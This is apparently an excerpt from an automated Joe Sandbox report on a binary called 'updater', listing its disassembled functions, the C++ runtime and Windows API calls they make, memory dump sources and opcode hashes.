                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013FC6D2
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC6F2
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC6FF
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: c1a223d08e65b511a574677c158167539c58e8fc1110ec2235563589d1ca6e3d
                                    • Instruction ID: 1176d332dc6ef1c255a5d1616b39b4333c5700dfb1622d5981c9207f67d6726e
                                    • Opcode Fuzzy Hash: c1a223d08e65b511a574677c158167539c58e8fc1110ec2235563589d1ca6e3d
                                    • Instruction Fuzzy Hash: B501D67190011A9BCB11EB68D850ABD7BB1BFA4328F18401EDA10AB3E0DF34DE01CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC9FF
                                    • int.LIBCPMT ref: 013FCA16
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013FCA50
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FCA70
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FCA7D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 1105b9414eb707b9db21e08b7cab1593d92e95ce3c117f3b2da22cc504844684
                                    • Instruction ID: 42441c7642c3ab28591f0968648d4f7b4d24de16580a8fce86bb551da89a8b53
                                    • Opcode Fuzzy Hash: 1105b9414eb707b9db21e08b7cab1593d92e95ce3c117f3b2da22cc504844684
                                    • Instruction Fuzzy Hash: 51014575D0011A9BCF05EB68D854AFD7B70BFA0368F28051DEA11A72E0DF30AA05CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC840
                                    • int.LIBCPMT ref: 013FC857
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013FC891
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC8B1
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC8BE
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 60aa8aea3e49acd04524578e35f36887751b759c034460af02ed730b30ddedb1
                                    • Instruction ID: 84deaaf1eff331a7cd0d64b72dbdd9bd9442c20bd36273b2c7b79796399320e9
                                    • Opcode Fuzzy Hash: 60aa8aea3e49acd04524578e35f36887751b759c034460af02ed730b30ddedb1
                                    • Instruction Fuzzy Hash: A401C471D0011AAFDB15AB68D850ABDBB75BFA4728F14441DDA10672E0DF749E01CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FCB29
                                    • int.LIBCPMT ref: 013FCB40
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013FCB7A
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FCB9A
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FCBA7
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: c66e52fe4fe3fcb2fd594795d9591f2543ae439d99898fef45652d7b6d7204b3
                                    • Instruction ID: fcd77c1f2fc5a9ede32fcab403cc6ae3d0fdbf2663e64e92dba6be257fc6fe43
                                    • Opcode Fuzzy Hash: c66e52fe4fe3fcb2fd594795d9591f2543ae439d99898fef45652d7b6d7204b3
                                    • Instruction Fuzzy Hash: B501D27590021E9BCB11EB68D854ABDBBB5BFA4368F18041DEA10AB6E0DF749E01C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FCBBE
                                    • int.LIBCPMT ref: 013FCBD5
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013FCC0F
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FCC2F
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FCC3C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 2cda9b923cd7ac35daa7faa369b47f29cefe074d44ab493dc72e48c6565b3d63
                                    • Instruction ID: d157c97931176529791bbe7206d4031fc3e7d5126f8d678db61e0b5f052c9ea4
                                    • Opcode Fuzzy Hash: 2cda9b923cd7ac35daa7faa369b47f29cefe074d44ab493dc72e48c6565b3d63
                                    • Instruction Fuzzy Hash: 9501D67590011A9BCB05EB68D850AFDBB71BFA4318F18451DEA00673E1DF749E02C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FCA94
                                    • int.LIBCPMT ref: 013FCAAB
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013FCAE5
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FCB05
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FCB12
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: d5dd2f1a8b7b87722269a4b9cdaddc7a4cf5cb399c7c57dc6e57700ffb91155a
                                    • Instruction ID: 32350c77ba8ee7f9be2f4333807b6716276555b3ccf8d58d8c91520fba8e05db
                                    • Opcode Fuzzy Hash: d5dd2f1a8b7b87722269a4b9cdaddc7a4cf5cb399c7c57dc6e57700ffb91155a
                                    • Instruction Fuzzy Hash: 7D01007690011A9BCB01EB689811EADBB70BFA0318F18000EEA01A72E0DF749E05CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013F6FE5
                                    • int.LIBCPMT ref: 013F6FFC
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013F7036
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013F7056
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013F7063
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 738ac6f363c24d84896ce15bca2fadb8907669f3cd057725341c560439d3de91
                                    • Instruction ID: ad1dcebfebd8974cd63b506d85042842e2e6c90649d41b9e1f66d0b15d80136d
                                    • Opcode Fuzzy Hash: 738ac6f363c24d84896ce15bca2fadb8907669f3cd057725341c560439d3de91
                                    • Instruction Fuzzy Hash: 6201D2B5D001179BCB11EB68D850ABDBB75BFA4368F28440DEA10A72E0DF749E05CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013F707A
                                    • int.LIBCPMT ref: 013F7091
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013F70CB
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013F70EB
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013F70F8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 62d9f9d2e184d471bccba11ef4bf70164b634a77ace1740ef511927559ed3ad0
                                    • Instruction ID: e1060826da847c6161ec40512c589ad686e194523680a5c4247fd9573921cf96
                                    • Opcode Fuzzy Hash: 62d9f9d2e184d471bccba11ef4bf70164b634a77ace1740ef511927559ed3ad0
                                    • Instruction Fuzzy Hash: 0A01F575D101179BCB11EB68D854AFDBB70BFA4718F18000DEA11A76E0DF349E05C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 01409552
                                    • int.LIBCPMT ref: 01409569
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 014095A3
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 014095C3
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 014095D0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: adb2e18b6d246ff8bda9c32aac2a150a7c6af3326221f121262dc6ef1b9ad7a7
                                    • Instruction ID: dd731e9a377abc6bbbd040d81202125f81f96cbfcbcbc30afc2d57dbff5c8fa1
                                    • Opcode Fuzzy Hash: adb2e18b6d246ff8bda9c32aac2a150a7c6af3326221f121262dc6ef1b9ad7a7
                                    • Instruction Fuzzy Hash: EC01D6729002169BCB12EB69D8506BEBBB1BFA4318F18045EEA05673E1EF749A01C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 014095E7
                                    • int.LIBCPMT ref: 014095FE
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 01409638
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 01409658
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 01409665
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: b051864b8e1c3d107e9ce28dc76f96ce60b479a9c593788725771424c7d38613
                                    • Instruction ID: f1a2ffca501edeeed8b6c86efec192eb8d1403a9b3b17ac3c3c09eb238e8be0d
                                    • Opcode Fuzzy Hash: b051864b8e1c3d107e9ce28dc76f96ce60b479a9c593788725771424c7d38613
                                    • Instruction Fuzzy Hash: 3301D671D001169BCB02EB69D854AFE7B75BFA4728F18041EEA09A73E1DF349A41C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 014097A6
                                    • int.LIBCPMT ref: 014097BD
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 014097F7
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 01409817
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 01409824
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: e5d05cb83a4776369d042cb97c7a73b1a428406cde3e2408d00d6c9748c07016
                                    • Instruction ID: a35770c5fcc2461a699b66c5291fa5d26165d077b50c38b16ba70b8e6fa6ab56
                                    • Opcode Fuzzy Hash: e5d05cb83a4776369d042cb97c7a73b1a428406cde3e2408d00d6c9748c07016
                                    • Instruction Fuzzy Hash: 7901D676900116DBCB16EB79D8506BEBBB4BFA4718F18011EDA14673F1DF349A01C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0140983B
                                    • int.LIBCPMT ref: 01409852
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 0140988C
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 014098AC
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 014098B9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: c499e77534f8fd90a28dbbdb59036ae54fdb504dc09e6bf82fdbf4605d03efaf
                                    • Instruction ID: e75fd1d3c3829bf92770a177ea20c7585fd638b5948ca0dd7c0312948b40d51a
                                    • Opcode Fuzzy Hash: c499e77534f8fd90a28dbbdb59036ae54fdb504dc09e6bf82fdbf4605d03efaf
                                    • Instruction Fuzzy Hash: ED01D676D00116EBDB12EB69D8506BE7B70BFA4718F28041EE904A73E1DF359A41C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 014296E9
                                      • Part of subcall function 01420123: HeapFree.KERNEL32(00000000,00000000), ref: 01420139
                                      • Part of subcall function 01420123: GetLastError.KERNEL32(?,?,0141DA9C), ref: 0142014B
                                    • _free.LIBCMT ref: 014296FB
                                    • _free.LIBCMT ref: 0142970D
                                    • _free.LIBCMT ref: 0142971F
                                    • _free.LIBCMT ref: 01429731
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: a21c1df379e27d4ba574be7c1219fa2e5f8422b77b1a8ed05d1cc36ddbeec879
                                    • Instruction ID: 0df533d08bd3c167a9141d9955c22f757970eb72caa32028541e2ca5c27ab32d
                                    • Opcode Fuzzy Hash: a21c1df379e27d4ba574be7c1219fa2e5f8422b77b1a8ed05d1cc36ddbeec879
                                    • Instruction Fuzzy Hash: F8F04972505230EBD634EA69E4C0C2B7BDAEB50A14FE4180BF259D7620CA35FDC0CAA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                    • LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                    • RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    • SetEvent.KERNEL32(?,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DC05
                                    • ResetEvent.KERNEL32(?,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DC11
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                    • String ID:
                                    • API String ID: 3916383385-0
                                    • Opcode ID: f41a6428219ef726f849e0bc8e0f21e5c2dcf3d8a5558bde9f85be604b3890c5
                                    • Instruction ID: 6a706738c9734b39a14578df3a5b5b6f11d47f661be97d3295db4c1de1ec5c8b
                                    • Opcode Fuzzy Hash: f41a6428219ef726f849e0bc8e0f21e5c2dcf3d8a5558bde9f85be604b3890c5
                                    • Instruction Fuzzy Hash: 89013CB6902720EFC727EF59F848D957BB5FB09762701406AF9468733ACB709881DB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: %s-mj%08X
                                    • API String ID: 4218353326-77246884
                                    • Opcode ID: a5a327700434d763058b00799792ef6ad06f9284171dcd5a136f7877211b0b32
                                    • Instruction ID: 9dff905fd22242d1ab43494f30e110caa13731214b4240daf4a0325ad32a4218
                                    • Opcode Fuzzy Hash: a5a327700434d763058b00799792ef6ad06f9284171dcd5a136f7877211b0b32
                                    • Instruction Fuzzy Hash: 5FD15B726183029FDB15DF6CD48092ABBE5BFC8618F14896EF889DB395DB70D801CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeallocateH_prolog2
                                    • String ID: ", "$: "
                                    • API String ID: 1002199092-747220369
                                    • Opcode ID: f60a34afa46b8f93c921fb97a2209d432f8560b2dea0821c2f10d09d556f50bc
                                    • Instruction ID: d3b4f0d546dc2874c688f2fda71981f4dee731d742ecde168f5d47a81f3b25f6
                                    • Opcode Fuzzy Hash: f60a34afa46b8f93c921fb97a2209d432f8560b2dea0821c2f10d09d556f50bc
                                    • Instruction Fuzzy Hash: CF41C270A01206AFDF14DF58C885BAEBBB5FF94718F04016EE901AB691DB70AD44CBE5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 0140C2AA
                                      • Part of subcall function 013F6F3F: std::_Lockit::_Lockit.LIBCPMT ref: 013F6F50
                                      • Part of subcall function 013F6F3F: int.LIBCPMT ref: 013F6F67
                                      • Part of subcall function 013F6F3F: std::_Lockit::~_Lockit.LIBCPMT ref: 013F6FC1
                                    • _Find_elem.LIBCPMT ref: 0140C344
